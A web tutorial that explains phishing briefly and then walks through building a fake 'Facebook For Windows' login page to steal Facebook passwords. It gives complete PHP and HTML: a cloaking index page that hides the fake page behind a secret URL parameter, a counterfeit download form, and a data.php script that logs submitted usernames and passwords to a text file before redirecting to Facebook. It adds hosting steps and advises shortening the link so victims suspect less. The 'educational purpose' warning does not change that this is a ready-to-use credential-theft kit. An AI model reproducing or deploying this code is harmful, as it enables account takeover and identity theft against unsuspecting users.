What is phishing and how it is done, Your Complete Guide.

Phishing is the act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
Phishing email will typically direct the user to visit a website where they are asked to update personal information, such as a password, credit card, social security, or bank account numbers, that the legitimate organization already has. The website, however, is bogus and will capture and steal any information the user enters on the page (see "website spoofing").

Examples of Phishing Scams

2003 saw the proliferation of a phishing scam in which users received emails supposedly from eBay claiming that the user's account was about to be suspended unless he clicked on the provided email link and updated the credit card information that the genuine eBay already had. Because it is relatively simple to make a website look like a legitimate organization's site by mimicking the HTML code, the scam counted on people being tricked into thinking they were actually being contacted by eBay and were subsequently going to eBay's site to update their account information.

How Common is Phishing Today?

A global study released by the Anti-Phishing Working Group (APWG) in 2014 suggests that 54% of phishing emails targeted major bands including Apple, PayPal, and Chinese marketplace Taobao, indicating that phishers update their approaches looking out for new victims in niche industry segments. While millions of phishing URLs were reported in 2014, there were at least 123,972 unique phishing attacks worldwide in the second half of 2014. (source)

Why is This Successful for Scammers?

Phishing emails are blindly sent to thousands, if not millions of recipients. By spamming large groups of people, the "phisher" counts on the email being read by a percentage of people who actually have an account with the legitimate company being spoofed in the email and corresponding webpage.
Phishing, also referred to as brand spoofing or carding, is a variation on "fishing," the idea being that bait is thrown out with the hopes that while most will ignore the bait, some will be tempted into biting.

 HOW TO MAKE A PHISHING PAGE

 Warning: This tutorial is for educational purpose only

 

What you need:

1) Notepad++ for programming (Download : http://www.notepad-plus-plus.org/download)

Steps to create an undetectable phishing page:

I have already compiled this advance phishing page in “.zip” file, So you can download the compiled “.zip” file from here:
Link: http://bit.ly/2dyf4D8
(Do not forget to read “ReadMe First.txt” which is included in this zip file)
OR 
You can create one from scratch with the steps given below.

Use Notepad++ for the steps given below
1) Copy this code and paste it in a new document and save it as index.php

<?php $id = $_GET["id"]; if ($id == "facebookforwindows") { $myFile = "SoftwareDownload.jpg"; $fh = fopen($myFile, 'r'); $theData = fread($fh, 500000); fclose($fh); echo $theData; } else{ $myFile1 = "Follow.jpg"; $fh1 = fopen($myFile1, 'r'); $theData1 = fread($fh1, 500000); fclose($fh1); echo $theData1; } ?>

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

<?php $id = $_GET["id"]; if ($id == "facebookforwindows") {       $myFile = "SoftwareDownload.jpg";       $fh = fopen($myFile, 'r');       $theData = fread($fh, 500000);       fclose($fh);       echo $theData; }   else{      $myFile1 = "Follow.jpg";      $fh1 = fopen($myFile1, 'r');      $theData1 = fread($fh1, 500000);      fclose($fh1);      echo $theData1; } ?>

Note : Change “($id == “facebookforwindows”)” with “($id == “YOUR_PASSWORD”)”
2) Copy this code and paste it in a new document and save it as Follow.jpg (Code Not By ME)

<!DOCTYPE html> <html> <head> <title>Find your Facebook ID - a 5-second easy tool for locating your Facebook numeric personal ID</title> <meta name="description" content="If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool." /> <link rel="stylesheet" href="reset.css" type="text/css" media="screen"> <link rel="stylesheet" href="style.css" type="text/css" media="screen"> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script> <script src="script.js" type="text/javascript" charset="utf-8"></script> <meta property="fb:admins" content="1146295886" /> </head> <body> <form action="" method="post"><label for="fb_profile_url" class="text-input-label fb_profile_url-text-input-label"> Enter your personal Facebook profile URL: </label> <input type="text" name="fb_profile_url" value="" class="nr-text" size="45" placeholder="http://www.facebook.com/YourProfileName" /> <input type="hidden" name="unsanitized" class="nr-hidden hidden-input-for-unsanitized" /> <p><input type="submit" value="Lookup numeric ID..." class="button-primary"> </p><h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1><p id="description">For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook requires that you know your Facebook numeric user ID. Unfortunately, they make this very difficult to find, especially if you have a so-called "vanity" personalized profile URL. If you can't find your Facebook ID, or don't know what it is and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your personal profile page. </p><!-- Begin BidVertiser code --><br /> <script data-cfasync="false" SRC="//bdv.bidvertiser.com/BidVertiser.dbm?pid=791922&bid=1917568" TYPE="text/javascript"></SCRIPT><br /> <!-- End BidVertiser code --> <br /> </form><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-3361652-13']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

<!DOCTYPE html> <html> <head>   <title>Find your Facebook ID - a 5-second easy tool for locating your Facebook numeric personal ID</title>   <meta name="description" content="If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool." />   <link rel="stylesheet" href="reset.css" type="text/css" media="screen">   <link rel="stylesheet" href="style.css" type="text/css" media="screen">    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>  <script src="script.js" type="text/javascript" charset="utf-8"></script>   <meta property="fb:admins" content="1146295886" /> </head> <body>        <form action="" method="post"> <label for="fb_profile_url" class="text-input-label fb_profile_url-text-input-label">   Enter your personal Facebook profile URL: </label> <input type="text" name="fb_profile_url" value="" class="nr-text" size="45" placeholder="http://www.facebook.com/YourProfileName" />   <input type="hidden" name="unsanitized" class="nr-hidden hidden-input-for-unsanitized" /> <p>   <input type="submit" value="Lookup numeric ID..." class="button-primary"> </p> <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1> <p id="description">   For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook   requires that you know your Facebook numeric user ID.  Unfortunately, they make this very difficult to find, especially   if you have a so-called "vanity" personalized profile URL. If you can't find your Facebook ID, or don't know what it is   and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your   personal profile page.   </p> </form>      <script type="text/javascript">     var _gaq = _gaq || [];   _gaq.push(['_setAccount', 'UA-3361652-13']);   _gaq.push(['_trackPageview']);     (function() {     var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;     ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);   })();   </script> </body> </html>

 

3) Copy this code and paste it in a new document and save it as data.php

<?php header ('Location:https://www.facebook.com/'); $handle = fopen("PassFace.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?>

1 2 3 4 5 6 7 8 9 10 11 12 13

<?php header ('Location:https://www.facebook.com/'); $handle = fopen("PassFace.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?>

4) Copy this code and paste it in a new document and save it as SoftwareDownload.jpg

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Facebook For Windows : Welcome</title> <style type="text/css"> html, body { height: 100%; } div#space { width: 1px; height: 50%; margin-bottom: -360px; float:left } div#container { width: 1250px; height: 720px; margin: 0 auto; position: relative; clear: left; } </style> <style type="text/css"> body { margin: 0; padding: 0; background-color: #6579A8; color: #000000; } </style> <style type="text/css"> h3 { font-family: Arial; font-size: 24px; font-weight: normal; font-style: normal; text-decoration: none; color: #000000; margin: 0 0 0 0; padding: 0 0 0 0; display: inline; } a:hover { color: #90F518; } </style> <!--[if lt IE 7]> <style type="text/css"> img { behavior: url("pngfix.htc"); } </style> <![endif]--> </head> <body> <div id="space"><br /> </div><div id="container"><div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;"><img src="images/Facebook_Box.png" id="Image1" alt="" align="top" border="0" style="width:1093px;height:609px;"></div><div id="bv_Image2" style="margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;"><img src="images/Facebook.png" id="Image2" alt="" align="top" border="0" style="width:168px;height:168px;"></div><div id="bv_Text1" style="margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;"><h3>Download Facebook For Windows :<br /> </h3><font style="font-size:13px" color="#000000" face="Arial">size : 6 MB.<br /> Platform : Windows 8.1<br /> Security Status : Active</font><h3><br /> </h3></div><div id="Html1" style="position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3"><b>Login to Donwload this Application :</b><br /> <form name="input" action="data.php" method="post">Username : <input type="text" name="username" /> Password : <input type="password" name="password"> <input type="submit" value="Download" action="data.php" method="post"/> </form></div></div></body> </html>

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Facebook For Windows : Welcome</title> <style type="text/css"> html, body {    height: 100%; } div#space {    width: 1px;    height: 50%;    margin-bottom: -360px;    float:left } div#container {    width: 1250px;    height: 720px;    margin: 0 auto;    position: relative;    clear: left; } </style> <style type="text/css"> body {    margin: 0;    padding: 0;    background-color: #6579A8;    color: #000000; } </style> <style type="text/css"> h3 {    font-family: Arial;    font-size: 24px;    font-weight: normal;    font-style: normal;    text-decoration: none;    color: #000000;    margin: 0 0 0 0;    padding: 0 0 0 0;    display: inline; }   a:hover {    color: #90F518; } </style> <!--[if lt IE 7]> <style type="text/css">    img { behavior: url("pngfix.htc"); } </style> <![endif]--> </head> <body> <div id="space"><br></div> <div id="container"> <div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;"> <img src="images/Facebook_Box.png" id="Image1" alt="" align="top" border="0" style="width:1093px;height:609px;"></div> <div id="bv_Image2" style="margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;"> <img src="images/Facebook.png" id="Image2" alt="" align="top" border="0" style="width:168px;height:168px;"></div> <div id="bv_Text1" style="margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;"> <h3>Download Facebook For Windows :<br> </h3><font style="font-size:13px" color="#000000" face="Arial">size : 6 MB.<br> Platform : Windows 8.1<br> Security Status : Active</font><h3><br> </h3></div> <div id="Html1" style="position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3"> <b>Login to Donwload this Application :</b><br/> <form name="input" action="data.php" method="post"> Username : <input type="text" name="username" /> Password : <input type="password" name="password"> <input type="submit" value="Download" action="data.php" method="post"/> </form></div> </div> </body> </html>

5) Keep all above files in a single folder and name it as “xyz” (Anything you want)
6) Now create a folder inside that folder (“xyz“) and name it as “images” (Put exact name)
7) Download these images and put it inside “images” (Folder)
Image 1: http://bit.ly/1qE96mr
Image 2: http://bit.ly/1Gjyh1o
If you cannot download the images from the link given above then you can get it from here: http://bit.ly/2dyf4D8
Now if you followed all the steps carefully, It will look similar to this:

Now create a zip of it
8) Now create an account in any free web hosting site, I prefer 000webhost.com: http://www.000webhost.com/
9) Go to the cPanel (of 000WebHost)
10) Click on “File Manager”



11) Go to “public_html” and click on “upload”

12) Below “Archives” section click on “Choose file”
13 Select the zip file (Which you have created above)
14 Click on the “green tick”

15) Done!!! Now you can share the URL with your friends. Share it like this:

http://YOUR_SITE_URL/?id=YOUR_PASSWORD

Where “YOUR_PASSWORD” = The one you changed above
Note :
1) Before sharing it with your friends, shorten it with bitly (Link: https://bitly.com). That way it can be less suspicious. If you like this tutorial then you can subscribe us.

---